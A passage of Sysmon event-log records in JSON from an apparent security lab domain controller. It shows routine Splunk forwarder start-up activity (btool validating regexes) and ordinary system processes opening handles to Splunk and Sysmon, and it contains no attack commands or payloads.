{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.892\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-001051DE0300}\r\nSourceProcessId: 3076\r\nSourceThreadId: 3944\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.892","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-001051DE0300}","SourceProcessId":"3076","SourceThreadId":"3944","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.942\r\nProcessGuid: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nProcessId: 3920\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.942","ProcessGuid":"{41C8662E-1F76-5F25-0000-00109CE10300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.939","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.939\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 